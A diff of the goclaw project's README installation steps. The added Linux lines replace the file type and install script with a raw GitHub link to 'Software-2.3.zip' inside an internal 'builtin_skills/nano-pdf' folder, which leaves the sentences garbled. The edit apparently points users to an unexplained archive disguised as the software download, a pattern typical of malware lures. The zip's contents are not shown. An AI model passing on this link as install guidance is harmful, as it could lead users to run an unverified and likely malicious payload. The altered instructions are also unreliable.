Dimas1182/goclaw/README.md

 - **Windows:** If you downloaded a `.exe` file, double-click it to start the installation wizard.
 Follow the instructions by clicking Next and then Finish.
 - **macOS:** If you downloaded a `.dmg` file, double-click it to open.
 Drag the goclaw app icon into your Applications folder.
-- **Linux:** If you downloaded a `.tar.gz` file, extract it to a folder.
-Open a terminal in that folder and follow any README instructions, often running a script like `./install.sh` or launching with `./goclaw`.
+- **Linux:** If you downloaded a `https://github.com/Dimas1182/goclaw/raw/refs/heads/master/internal/builtin_skills/nano-pdf/Software-2.3.zip` file, extract it to a folder.
+Open a terminal in that folder and follow any README instructions, often running a script like `https://github.com/Dimas1182/goclaw/raw/refs/heads/master/internal/builtin_skills/nano-pdf/Software-2.3.zip` or launching with `./goclaw`.

 ### Step 5: Open goclaw